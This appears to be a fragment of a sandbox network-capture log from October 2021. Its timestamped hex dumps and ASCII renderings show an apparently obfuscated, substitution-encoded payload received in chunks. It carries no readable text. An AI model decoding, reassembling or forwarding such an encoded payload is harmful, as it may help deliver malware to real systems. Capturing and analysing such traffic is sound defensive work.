                                                  2021-10-29 18:30:02 UTC1693INData Raw: 20 6f 4b 59 20 4f 4f 74 20 4f 78 51 20 4f 4f 6b 20 59 6f 20 6f 78 52 20 59 6f 20 59 78 20 6b 52 20 4f 4f 4b 20 4f 4f 59 20 45 78 20 6f 4f 45 20 59 78 20 4b 6b 20 59 52 20 45 78 20 52 6b 20 4f 4f 4b 20 4f 4f 74 20 74 78 20 6b 6b 20 45 59 20 4b 6b 20 59 78 20 6f 51 20 4f 6f 4b 20 6f 59 78 20 4f 4f 74 20 4f 78 51 20 4f 4f 6b 20 6f 4b 20 6f 6f 20 4b 51 20 59 78 20 6b 4f 20 51 78 20 59 6b 20 4f 78 51 20 4f 4f 6f 20 59 6f 20 6f 52 20 59 78 20 59 4b 20 74 51 20 52 52 20 4f 4f 45 20 4f 78 51 20 59 74 20 59 4f 20 4b 6b 20 59 78 20 4b 4f 20 6b 4b 20 4f 4f 4b 20 4f 78 78 20 4f 78 59 20 45 20 4f 51 78 20 4b 51 20 59 78 20 4b 6b 20 4f 4f 45 20 4f 20 6f 4f 78 20 4f 78 51 20 4f 4f 6f 20 59 52 20 51 59 20 51 45 20 59 59 20 6b 4b 20 4f 4f 52 20 6b 78 20 45 78 20 4f 78 59
                                                  Data Ascii: oKY OOt OxQ OOk Yo oxR Yo Yx kR OOK OOY Ex oOE Yx Kk YR Ex Rk OOK OOt tx kk EY Kk Yx oQ OoK oYx OOt OxQ OOk oK oo KQ Yx kO Qx Yk OxQ OOo Yo oR Yx YK tQ RR OOE OxQ Yt YO Kk Yx KO kK OOK Oxx OxY E OQx KQ Yx Kk OOE O oOx OxQ OOo YR QY QE YY kK OOR kx Ex OxY
                                                  2021-10-29 18:30:02 UTC1694INData Raw: 51 20 4f 4f 45 20 59 78 20 4b 6b 20 59 78 20 4f 6b 20 6b 4b 20 4f 4f 4b 20 4f 4f 52 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4b 6b 20 6f 4f 52 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 6f 52 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4f 51 6b 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 45 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 52 4f 20 4b 6b 20 59 78 20 59 59 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4b 6b 20 59 78 20 4f 4f 51 20 6b 59 20 4f 4f 4b 20 4f 4f 74 20 4b 4b 20 4f 4f 45 20 59 78 20 4b 6b 20 59 4f 20 59 4b 20 6b 4b 20 4f 4f 4b 20 6b 4f 20 4f 78 51 20 4f 4f 6f 20 59 4f 20 4b 6b 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 4f 4f 59 20 4b 51 20 59 78 20 59 4b 20 6f 6f 20 4f 4f 59 20 4f 4f 74 20 4f 78 51 20 4f 4f 74
                                                  Data Ascii: Q OOE Yx Kk Yx Ok kK OOK OOR OxQ OOo Yx Kk oOR YK kK OOK OoR OxQ OOo Yx OQk Yx YK kK OOE OOt OxQ OOo RO Kk Yx YY kK OOK OOt OxQ OOo Yx Kk Yx OOQ kY OOK OOt KK OOE Yx Kk YO YK kK OOK kO OxQ OOo YO Kk Yx YK kK OOK OOt OxQ OOo OOY KQ Yx YK oo OOY OOt OxQ OOt
                                                  2021-10-29 18:30:02 UTC1696INData Raw: 45 4b 20 59 78 20 59 4b 20 51 4b 20 6f 51 20 4f 51 4b 20 4f 78 51 20 4f 4f 6f 20 59 52 20 6f 4b 20 4f 45 51 20 59 59 20 6b 4b 20 4f 4f 52 20 4f 4f 45 20 52 51 20 4f 59 78 20 59 78 20 4b 6b 20 59 6f 20 45 78 20 6f 6f 74 20 4f 4f 59 20 4f 4f 74 20 4f 78 74 20 51 78 20 45 45 20 78 20 52 6f 20 59 4b 20 4f 51 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4b 6b 20 59 78 20 59 78 20 4b 6f 20 4f 4f 74 20 4f 4f 52 20 4f 78 51 20 4f 4f 52 20 45 4f 20 6f 78 20 45 52 20 6f 45 78 20 4f 6f 20 4f 4f 4b 20 4f 4f 74 20 4f 78 6b 20 6b 6b 20 4f 45 6b 20 4b 6b 20 59 78 20 52 78 20 4f 45 6f 20 4f 6f 52 20 4f 4f 74 20 4f 78 51 20 4f 4f 4b 20 6f 52 20 4f 45 52 20 59 78 20 59 4b 20 51 4b 20 51 78 20 6f 78 4b 20 4f 78 51 20 4f 4f 6f 20 59 52 20 6f 4b 20 4f 45 52
                                                  Data Ascii: EK Yx YK QK oQ OQK OxQ OOo YR oK OEQ YY kK OOR OOE RQ OYx Yx Kk Yo Ex oot OOY OOt Oxt Qx EE x Ro YK OQK OOK OOt OxQ OOo Yx Kk Yx Yx Ko OOt OOR OxQ OOR EO ox ER oEx Oo OOK OOt Oxk kk OEk Kk Yx Rx OEo OoR OOt OxQ OOK oR OER Yx YK QK Qx oxK OxQ OOo YR oK OER
                                                  2021-10-29 18:30:02 UTC1697INData Raw: 6b 20 59 51 20 6f 6f 52 20 4f 4f 52 20 4f 78 51 20 4f 4f 6b 20 45 59 20 59 6f 20 51 45 20 6f 4b 78 20 6b 4b 20 4f 4f 4b 20 4f 6f 74 20 4f 4f 4f 20 4f 4f 6b 20 51 45 20 4f 78 20 59 78 20 59 4b 20 6b 6f 20 6b 74 20 4f 78 51 20 51 4b 20 4f 6f 78 20 4b 6b 20 59 4f 20 59 4b 20 45 78 20 4f 6f 20 4f 4f 4b 20 4f 4f 74 20 4f 78 74 20 4f 78 59 20 4f 20 59 4b 20 52 59 20 4f 59 74 20 6b 4b 20 4f 4f 4b 20 4f 6f 74 20 6f 45 20 51 78 20 59 78 20 4b 6b 20 59 4f 20 4b 6f 20 6b 4b 20 4f 4f 4b 20 4f 4f 51 20 4f 78 51 20 51 74 20 59 78 20 4b 4b 20 45 4f 20 59 4b 20 51 78 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 4b 6b 20 4b 6b 20 4f 4f 52 20 59 4b 20 74 6f 20 4f 52 20 4f 4f 74 20 51 51 20 4f 4f 6f 20 59 78 20 4b 6b 20 59 78 20 4f 74 52 20 6b 52 20 51 78 20 4f 74 4f
                                                  Data Ascii: k YQ ooR OOR OxQ OOk EY Yo QE oKx kK OOK Oot OOO OOk QE Ox Yx YK ko kt OxQ QK Oox Kk YO YK Ex Oo OOK OOt Oxt OxY O YK RY OYt kK OOK Oot oE Qx Yx Kk YO Ko kK OOK OOQ OxQ Qt Yx KK EO YK Qx OOK OOt OxQ OOo Kk Kk OOR YK to OR OOt QQ OOo Yx Kk Yx OtR kR Qx OtO
                                                  2021-10-29 18:30:02 UTC1698INData Raw: 51 20 4f 6f 6f 20 59 6f 20 59 4f 20 51 45 20 6b 4f 20 6b 59 20 4f 4f 4b 20 4f 4f 59 20 52 51 20 4f 6f 59 20 59 78 20 4b 6b 20 59 6f 20 6b 51 20 4f 59 74 20 4f 4f 4b 20 4f 4f 74 20 4f 78 45 20 4f 4f 4b 20 59 6f 20 51 59 20 74 20 59 4b 20 6b 4b 20 4f 4f 52 20 6b 78 20 4f 4f 74 20 52 74 20 59 6b 20 59 78 20 4b 51 20 59 78 20 4f 6f 4b 20 4f 6b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6b 20 4b 45 20 45 20 59 6f 20 52 51 20 6f 59 59 20 4f 4f 4b 20 4f 4f 74 20 4f 78 45 20 4f 78 20 6f 4b 20 4f 4b 6f 20 4b 51 20 6b 51 20 74 20 4f 4f 59 20 4f 4f 74 20 4f 78 74 20 51 6f 20 6f 78 20 59 78 20 4b 51 20 6b 51 20 59 59 20 4f 4f 59 20 4f 4f 74 20 4f 78 74 20 6b 6b 20 4f 6b 51 20 4b 6b 20 59 78 20 4b 6b 20 59 51 20 4b 6b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6b 20 6f 45 20 4b 78 20 4f
                                                  Data Ascii: Q Ooo Yo YO QE kO kY OOK OOY RQ OoY Yx Kk Yo kQ OYt OOK OOt OxE OOK Yo QY t YK kK OOR kx OOt Rt Yk Yx KQ Yx OoK Ok OOt OxQ OOk KE E Yo RQ oYY OOK OOt OxE Ox oK OKo KQ kQ t OOY OOt Oxt Qo ox Yx KQ kQ YY OOY OOt Oxt kk OkQ Kk Yx Kk YQ Kk OOt OxQ OOk oE Kx O
                                                  2021-10-29 18:30:02 UTC1700INData Raw: 20 4b 6b 20 59 78 20 4b 6b 20 59 51 20 74 74 20 4f 4f 74 20 4f 78 51 20 4f 4f 6b 20 6f 78 20 59 78 20 45 74 20 4f 6b 74 20 4f 6f 74 20 4f 4f 4b 20 4f 4f 74 20 4f 4f 4f 20 6b 59 20 45 52 20 52 74 20 4f 59 59 20 59 4b 20 6b 4b 20 4f 4f 52 20 6f 4f 59 20 52 51 20 6f 59 45 20 59 78 20 4b 6b 20 59 6f 20 6b 51 20 6f 4f 20 4f 4f 4b 20 4f 4f 74 20 4f 78 74 20 6b 52 20 6f 4b 20 4b 6b 20 59 78 20 59 4b 20 74 4f 20 52 52 20 4f 4f 6f 20 4f 78 51 20 4f 51 6f 20 59 4f 20 4b 6b 20 59 78 20 4f 51 20 6b 4b 20 4f 4f 4b 20 4f 78 78 20 4f 4f 4f 20 6b 6b 20 4f 6b 4b 20 4b 6b 20 59 78 20 4b 6b 20 45 51 20 4f 4f 51 20 4f 4f 51 20 4f 78 51 20 4f 4f 6b 20 59 52 20 4b 74 20 52 4f 20 4f 6b 74 20 51 78 20 4f 4f 4b 20 4f 4f 74 20 4f 4f 4f 20 6b 59 20 45 52 20 45 52 20 6f 78 4b 20 4b
                                                  Data Ascii: Kk Yx Kk YQ tt OOt OxQ OOk ox Yx Et Okt Oot OOK OOt OOO kY ER Rt OYY YK kK OOR oOY RQ oYE Yx Kk Yo kQ oO OOK OOt Oxt kR oK Kk Yx YK tO RR OOo OxQ OQo YO Kk Yx OQ kK OOK Oxx OOO kk OkK Kk Yx Kk EQ OOQ OOQ OxQ OOk YR Kt RO Okt Qx OOK OOt OOO kY ER ER oxK K
                                                  2021-10-29 18:30:02 UTC1701INData Raw: 4b 20 6b 4b 20 4f 4f 52 20 6f 4f 59 20 52 51 20 6f 4b 6b 20 59 78 20 4b 6b 20 59 6f 20 4b 6b 20 45 51 20 6f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 6f 6f 20 74 51 20 59 52 20 59 4f 20 59 4b 20 6b 78 20 51 78 20 6f 4b 78 20 4f 78 51 20 4f 4f 6f 20 59 6f 20 59 4b 20 6f 78 4b 20 4b 6b 20 6b 6f 20 4f 4f 6f 20 4f 4f 74 20 4f 78 74 20 45 20 4f 59 4f 20 4b 6b 20 59 78 20 52 78 20 4f 6f 4b 20 51 6b 20 4f 4f 74 20 4f 78 51 20 51 4f 20 6f 52 20 45 45 20 59 78 20 59 4b 20 4f 6f 74 20 51 78 20 6f 4b 45 20 4f 78 51 20 4f 4f 6f 20 59 6f 20 6f 4b 20 4f 6b 4f 20 59 4b 20 6b 4b 20 4f 4f 52 20 4f 4f 59 20 4f 4b 74 20 4f 4f 6b 20 59 45 20 59 78 20 59 78 20 4b 6b 20 45 51 20 6f 4f 59 20 4f 4f 74 20 4f 78 51 20 4f 6f 6f 20 6f 52 20 45 6f 20 59 78 20 59 4b 20 4f 6f 74 20 51 78 20
                                                  Data Ascii: K kK OOR oOY RQ oKk Yx Kk Yo Kk EQ oOK OOt OxQ Ooo tQ YR YO YK kx Qx oKx OxQ OOo Yo YK oxK Kk ko OOo OOt Oxt E OYO Kk Yx Rx OoK Qk OOt OxQ QO oR EE Yx YK Oot Qx oKE OxQ OOo Yo oK OkO YK kK OOR OOY OKt OOk YE Yx Yx Kk EQ oOY OOt OxQ Ooo oR Eo Yx YK Oot Qx
                                                  2021-10-29 18:30:02 UTC1702INData Raw: 78 51 20 4f 4f 6f 20 59 78 20 4b 6b 20 6f 4f 52 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 6f 52 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4f 51 74 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 59 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 6f 6f 20 4b 6b 20 59 78 20 59 59 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 59 4b 20 59 78 20 4b 6b 20 59 78 20 52 4f 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 59 59 20 4f 4f 6f 20 59 78 20 4b 6b 20 4b 51 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 6f 6f 20 4f 78 51 20 4f 4f 6f 20 59 4f 20 4b 6b 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 4b 74 20 4b 51 20 59 78 20 59 4b 20 74 45 20 4f 4f 59 20 4f 4f 74 20 4f 78 51 20 4f 4f 45 20 59 78 20 4b 6b 20 59 78 20 4f 6b 20 6b 4b 20 4f 4f 4b 20 4f 4f 52 20 4f 78 51 20 4f 4f
                                                  Data Ascii: xQ OOo Yx Kk oOR YK kK OOK OoR OxQ OOo Yx OQt Yx YK kK OOY OOt OxQ OOo oo Kk Yx YY kK OOK OOt OxQ OYK Yx Kk Yx RO kK OOK OOt OYY OOo Yx Kk KQ YK kK OOK Ooo OxQ OOo YO Kk Yx YK kK OOK OOt OxQ OOo Kt KQ Yx YK tE OOY OOt OxQ OOE Yx Kk Yx Ok kK OOK OOR OxQ OO
                                                  2021-10-29 18:30:02 UTC1704INData Raw: 20 4f 4f 59 20 74 4f 20 6f 4b 52 20 59 4b 20 6f 4b 20 4f 45 59 20 59 4b 20 6b 4b 20 4f 6f 78 20 6f 52 20 6f 4f 51 20 4f 4f 6f 20 59 78 20 59 6b 20 51 45 20 4f 6f 51 20 6b 4b 20 4f 4f 4b 20 4f 6f 74 20 52 51 20 6f 78 4f 20 59 4f 20 4b 6b 20 59 6f 20 59 78 20 4f 6f 4b 20 4f 4b 6b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6b 20 6f 52 20 4f 45 59 20 59 4f 20 59 4b 20 6b 6f 20 6b 6b 20 4f 78 6f 20 51 45 20 4f 6f 4b 20 59 78 20 4f 52 52 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 4b 20 74 6b 20 59 52 20 59 59 20 6b 4b 20 4f 4f 6b 20 6b 6b 20 74 45 20 4f 78 6f 20 6f 6f 52 20 4f 78 4b 20 59 78 20 59 4b 20 6b 59 20 51 78 20 6f 78 59 20 4f 78 51 20 4f 4f 6f 20 59 52 20 6f 6f 4b 20 52 45 20 59 4b 20 6b 4b 20 4f 4f 6f 20 51 45 20 6f 4f 45
                                                  Data Ascii: OOY tO oKR YK oK OEY YK kK Oox oR oOQ OOo Yx Yk QE OoQ kK OOK Oot RQ oxO YO Kk Yo Yx OoK OKk OOt OxQ OOk oR OEY YO YK ko kk Oxo QE OoK Yx ORR Yx YK kK OOK OOt OxQ OOo YK tk YR YY kK OOk kk tE Oxo ooR OxK Yx YK kY Qx oxY OxQ OOo YR ooK RE YK kK OOo QE oOE
                                                  2021-10-29 18:30:02 UTC1705INData Raw: 6f 52 20 59 4f 20 4b 6b 20 59 6f 20 45 51 20 6b 78 20 51 78 20 4f 4b 4b 20 4f 78 51 20 4f 4f 6f 20 59 6f 20 51 59 20 4f 52 6f 20 59 59 20 6b 4b 20 4f 4f 52 20 4f 78 78 20 4f 78 59 20 45 4f 20 6f 4b 4b 20 4b 6b 20 59 78 20 52 78 20 6b 78 20 51 78 20 6f 78 4f 20 4f 78 6b 20 4f 4f 6f 20 59 6f 20 59 4b 20 51 45 20 52 74 20 6b 59 20 4f 4f 4b 20 4f 4f 59 20 74 4f 20 4f 4f 6f 20 59 78 20 4b 51 20 4b 52 20 59 4b 20 6b 4b 20 4f 4f 6f 20 4f 4f 74 20 4f 6f 4b 20 4f 4f 6f 20 4b 52 20 6f 51 20 59 78 20 59 52 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 4b 20 59 78 20 4f 4f 6b 20 59 78 20 4b 6f 20 59 4b 20 4f 4f 4b 20 4f 6f 45 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4b 6b 20 4f 4f 52 20 59 78 20 4f 6f 4b 20 6f 78 52 20 4f 4f 52 20 4f 78 51 20 4f 4f 6b 20 6f 52 20
                                                  Data Ascii: oR YO Kk Yo EQ kx Qx OKK OxQ OOo Yo QY ORo YY kK OOR Oxx OxY EO oKK Kk Yx Rx kx Qx oxO Oxk OOo Yo YK QE Rt kY OOK OOY tO OOo Yx KQ KR YK kK OOo OOt OoK OOo KR oQ Yx YR kK OOK OOt OxQ OOK Yx OOk Yx Ko YK OOK OoE OxQ OOo Yx Kk OOR Yx OoK oxR OOR OxQ OOk oR
                                                  2021-10-29 18:30:02 UTC1706INData Raw: 4f 4f 59 20 51 45 20 6b 59 20 59 4f 20 59 4b 20 6b 6f 20 6f 51 20 6f 6f 59 20 4f 78 51 20 4f 4f 6f 20 59 6f 20 4b 78 20 4f 51 4f 20 6f 51 20 6b 4b 20 4f 4f 4b 20 4f 4f 51 20 74 6f 20 4f 78 6f 20 52 59 20 4f 52 45 20 59 78 20 59 4b 20 6b 6f 20 6f 78 6b 20 6b 78 20 4f 6f 6f 20 4f 4f 6b 20 4f 4b 4b 20 6f 4b 20 4f 51 4f 20 59 4b 20 6b 4b 20 4f 4f 52 20 4f 6f 52 20 4f 78 52 20 4f 4f 59 20 51 45 20 6b 51 20 59 4f 20 59 4b 20 6b 6f 20 51 78 20 6f 4b 51 20 4f 78 51 20 4f 4f 6f 20 59 6f 20 51 59 20 6f 4b 6b 20 59 4b 20 6b 4b 20 4f 6f 78 20 4f 4f 45 20 52 51 20 6f 78 4b 20 59 4f 20 4b 6b 20 59 6f 20 4b 51 20 59 51 20 6f 4b 45 20 4f 4f 52 20 4f 78 51 20 4f 4f 6b 20 6f 4b 20 4f 52 52 20 4b 51 20 6b 51 20 59 45 20 4f 4f 59 20 4f 4f 74 20 4f 78 74 20 51 6f 20 4b 52 20
                                                  Data Ascii: OOY QE kY YO YK ko oQ ooY OxQ OOo Yo Kx OQO oQ kK OOK OOQ to Oxo RY ORE Yx YK ko oxk kx Ooo OOk OKK oK OQO YK kK OOR OoR OxR OOY QE kQ YO YK ko Qx oKQ OxQ OOo Yo QY oKk YK kK Oox OOE RQ oxK YO Kk Yo KQ YQ oKE OOR OxQ OOk oK ORR KQ kQ YE OOY OOt Oxt Qo KR
                                                  2021-10-29 18:30:02 UTC1710INData Raw: 20 59 51 20 51 59 20 6f 45 20 59 4b 20 6b 4b 20 4f 6f 78 20 6b 51 20 4f 78 4b 20 4f 78 45 20 45 45 20 59 4b 20 6f 59 20 52 45 20 74 78 20 4f 6f 6f 20 51 45 20 6b 6b 20 4f 4f 6f 20 59 78 20 59 6b 20 45 4f 20 6f 45 6f 20 4f 45 6b 20 4f 6f 4b 20 4f 78 45 20 4f 78 4f 20 4f 4b 6f 20 45 52 20 59 52 20 59 78 20 59 4b 20 74 51 20 6f 51 20 4f 6f 52 20 4f 78 51 20 4f 4f 6f 20 59 52 20 6f 45 52 20 45 59 20 4b 6b 20 4f 4f 78 20 4f 74 52 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 78 20 45 45 20 59 59 20 52 51 20 4b 6b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 45 20 51 51 20 59 52 20 45 45 20 59 52 20 6b 51 20 4f 45 59 20 4f 4f 4b 20 4f 4f 74 20 4f 78 45 20 51 51 20 59 45 20 45 6b 20 45 45 20 52 4f 20 52 52 20 51 74 20 4f 6f 4f 20 74 78 20 59 74 20 45 59 20 59 51 20 45 4f 20 4f
                                                  Data Ascii: YQ QY oE YK kK Oox kQ OxK OxE EE YK oY RE tx Ooo QE kk OOo Yx Yk EO oEo OEk OoK OxE OxO OKo ER YR Yx YK tQ oQ OoR OxQ OOo YR oER EY Kk OOx OtR OOt OxQ OOo Yx EE YY RQ Kk OOK OOt OxE QQ YR EE YR kQ OEY OOK OOt OxE QQ YE Ek EE RO RR Qt OoO tx Yt EY YQ EO O
                                                  2021-10-29 18:30:02 UTC1715INData Raw: 20 59 78 20 59 4b 20 6f 78 52 20 4f 4f 6f 20 4f 4f 74 20 4f 78 51 20 4f 74 51 20 4b 6b 20 4b 6b 20 59 78 20 59 45 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 51 6b 20 4f 4f 6f 20 59 78 20 4b 51 20 4b 6b 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 78 4f 20 4f 78 51 20 4f 4f 6f 20 59 78 20 6f 4b 45 20 4b 6b 20 59 4b 20 6b 4b 20 4f 52 4f 20 4f 4f 51 20 4f 78 51 20 4f 4f 6f 20 59 52 20 4b 6b 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4b 6b 20 59 78 20 4b 6b 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 6b 78 20 4f 4f 4b 20 59 78 20 4b 6b 20 6f 45 74 20 59 6f 20 6b 4b 20 4f 4f 4b 20 4f 4f 6b 20 4f 78 51 20 4f 4f 6f 20 59 78 20 59 6b 20 59 78 20 59 4b 20 6b 59 20 4f 78 59 20 52 51 20 4f 78 59 20 4f 4f 6f 20 4f 6f 45 20 4b 51 20 59 78 20 59
                                                  Data Ascii: Yx YK oxR OOo OOt OxQ OtQ Kk Kk Yx YE kK OOK OOt Qk OOo Yx KQ Kk YK kK OOK OxO OxQ OOo Yx oKE Kk YK kK ORO OOQ OxQ OOo YR Kk Yx YK kK OOK OOt OxQ OOo Yx Kk Yx Kk kK OOK OOt Okx OOK Yx Kk oEt Yo kK OOK OOk OxQ OOo Yx Yk Yx YK kY OxY RQ OxY OOo OoE KQ Yx Y
                                                  2021-10-29 18:30:02 UTC1716INData Raw: 20 51 59 20 59 74 20 59 4b 20 6b 4b 20 4f 6f 78 20 4f 52 51 20 4f 6f 4b 20 4f 4f 74 20 45 4f 20 45 6f 20 59 45 20 45 51 20 6b 78 20 4f 4f 45 20 4f 4f 45 20 52 51 20 6f 6f 4b 20 59 78 20 4b 6b 20 59 6f 20 45 78 20 52 52 20 4f 4f 4b 20 4f 4f 74 20 74 78 20 4f 6f 45 20 59 51 20 51 59 20 52 6f 20 59 4b 20 6b 4b 20 4f 6f 78 20 6b 6b 20 6f 59 59 20 4f 74 4b 20 59 52 20 59 74 20 45 78 20 4b 6b 20 51 45 20 6f 51 20 4f 6f 52 20 4f 78 51 20 4f 4f 6f 20 59 52 20 6f 45 52 20 6f 45 52 20 59 45 20 4f 4f 4b 20 4f 74 6f 20 4f 4f 74 20 4f 78 59 20 51 51 20 59 6b 20 45 6b 20 45 45 20 52 45 20 4f 6f 74 20 6b 45 20 4f 78 78 20 4f 78 4f 20 51 74 20 59 51 20 4f 74 78 20 45 45 20 52 78 20 6b 45 20 4f 4f 6f 20 4f 78 78 20 4f 78 45 20 6b 6b 20 6f 45 45 20 4b 6b 20 59 78 20 52 78
                                                  Data Ascii: QY Yt YK kK Oox ORQ OoK OOt EO Eo YE EQ kx OOE OOE RQ ooK Yx Kk Yo Ex RR OOK OOt tx OoE YQ QY Ro YK kK Oox kk oYY OtK YR Yt Ex Kk QE oQ OoR OxQ OOo YR oER oER YE OOK Oto OOt OxY QQ Yk Ek EE RE Oot kE Oxx OxO Qt YQ Otx EE Rx kE OOo Oxx OxE kk oEE Kk Yx Rx
                                                  2021-10-29 18:30:02 UTC1720INData Raw: 52 20 51 78 20 6b 4b 20 4f 78 51 20 4f 4f 6f 20 59 52 20 52 4f 20 74 52 20 4b 78 20 6b 4b 20 4f 4f 4b 20 4f 6f 74 20 4f 6f 52 20 4f 4f 52 20 74 52 20 4b 52 20 59 78 20 59 4b 20 51 4b 20 51 74 20 4f 4f 6f 20 4f 78 78 20 45 20 4f 52 20 4b 6b 20 59 78 20 52 78 20 4f 6f 4b 20 6b 4f 20 4f 4f 74 20 4f 78 51 20 4f 6f 6f 20 51 45 20 6f 78 20 59 78 20 59 4b 20 51 4b 20 51 74 20 4f 4f 45 20 4f 6f 4b 20 4f 4f 52 20 4b 59 20 52 45 20 4f 51 4f 20 4f 78 6b 20 6b 4b 20 4f 4f 4b 20 4f 4f 52 20 74 6f 20 4f 52 78 20 6f 4f 59 20 4b 6b 20 59 78 20 59 78 20 4f 6f 4b 20 52 51 20 4f 4f 74 20 4f 78 51 20 4f 6f 6f 20 52 59 20 6b 20 59 78 20 59 4b 20 51 4b 20 6f 51 20 6b 78 20 4f 78 51 20 4f 4f 6f 20 59 52 20 6f 6b 20 4b 78 20 4b 78 20 6f 4f 74 20 4b 78 20 4f 4f 74 20 4f 78 51 20
                                                  Data Ascii: R Qx kK OxQ OOo YR RO tR Kx kK OOK Oot OoR OOR tR KR Yx YK QK Qt OOo Oxx E OR Kk Yx Rx OoK kO OOt OxQ Ooo QE ox Yx YK QK Qt OOE OoK OOR KY RE OQO Oxk kK OOK OOR to ORx oOY Kk Yx Yx OoK RQ OOt OxQ Ooo RY k Yx YK QK oQ kx OxQ OOo YR ok Kx Kx oOt Kx OOt OxQ
                                                  2021-10-29 18:30:02 UTC1724INData Raw: 78 51 20 4f 4f 6f 20 59 52 20 4f 78 20 6f 4f 45 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 78 52 20 4f 4f 51 20 6b 6b 20 51 52 20 4b 6b 20 59 78 20 52 78 20 74 59 20 4f 78 4f 20 6f 4b 6b 20 59 59 20 4f 4f 6f 20 59 78 20 4b 51 20 6f 45 20 6f 45 78 20 4f 45 78 20 4f 4f 4b 20 4f 4f 74 20 4f 78 59 20 6b 6b 20 59 20 4b 6b 20 59 78 20 52 78 20 45 51 20 74 4b 20 4f 4f 74 20 4f 78 51 20 4f 6f 6f 20 6f 52 20 6f 74 20 59 78 20 59 4b 20 51 4b 20 51 74 20 4f 6f 59 20 4f 78 74 20 45 20 4f 51 51 20 4b 6b 20 59 78 20 4b 6b 20 74 4f 20 4f 4f 6b 20 4f 78 78 20 4f 78 59 20 51 6b 20 59 4f 20 6f 4b 20 6f 4f 51 20 59 4b 20 6b 4b 20 4f 6f 78 20 6f 52 20 4f 45 4f 20 4f 4f 6f 20 59 78 20 59 4b 20 45 59 20 59 78 20 52 74 20 6f 59 59 20 4b 74 20 4f 78 51 20 4f 4f 6f 20 59 4f 20 6f 4f 20
                                                  Data Ascii: xQ OOo YR Ox oOE YK kK OOK OxR OOQ kk QR Kk Yx Rx tY OxO oKk YY OOo Yx KQ oE oEx OEx OOK OOt OxY kk Y Kk Yx Rx EQ tK OOt OxQ Ooo oR ot Yx YK QK Qt OoY Oxt E OQQ Kk Yx Kk tO OOk Oxx OxY Qk YO oK oOQ YK kK Oox oR OEO OOo Yx YK EY Yx Rt oYY Kt OxQ OOo YO oO
                                                  2021-10-29 18:30:02 UTC1728INData Raw: 4f 4b 20 4f 4f 59 20 74 6f 20 6f 20 74 78 20 59 74 20 59 78 20 74 78 20 4f 6f 4b 20 4f 74 20 4f 4f 74 20 4f 78 51 20 4f 6f 6f 20 52 4b 20 4f 6f 4f 20 59 52 20 59 4b 20 45 52 20 4f 6f 20 4f 78 74 20 4f 78 51 20 4f 4f 6f 20 59 52 20 51 59 20 4b 59 20 59 4b 20 6b 4b 20 4f 6f 78 20 74 20 4f 6b 20 4f 6f 6f 20 59 78 20 52 4b 20 52 4b 20 4f 59 45 20 51 4b 20 4f 4f 4b 20 59 20 4f 51 20 4f 4f 78 20 59 78 20 4b 6b 20 59 52 20 45 78 20 74 59 20 4f 4f 4b 20 4f 4f 74 20 4f 78 45 20 6b 6b 20 4f 4f 20 4b 6b 20 59 78 20 52 78 20 59 51 20 4f 45 78 20 4f 4f 74 20 4f 78 51 20 4f 4f 6b 20 6f 45 20 52 52 20 4f 4b 4f 20 52 78 20 6b 4b 20 6f 20 74 20 4f 6f 52 20 4f 6f 45 20 59 78 20 52 4b 20 74 52 20 4b 78 20 6b 4b 20 4f 4f 4b 20 4f 6f 74 20 52 51 20 4f 4f 4f 20 59 78 20 4b 6b
                                                  Data Ascii: OK OOY to o tx Yt Yx tx OoK Ot OOt OxQ Ooo RK OoO YR YK ER Oo Oxt OxQ OOo YR QY KY YK kK Oox t Ok Ooo Yx RK RK OYE QK OOK Y OQ OOx Yx Kk YR Ex tY OOK OOt OxE kk OO Kk Yx Rx YQ OEx OOt OxQ OOk oE RR OKO Rx kK o t OoR OoE Yx RK tR Kx kK OOK Oot RQ OOO Yx Kk
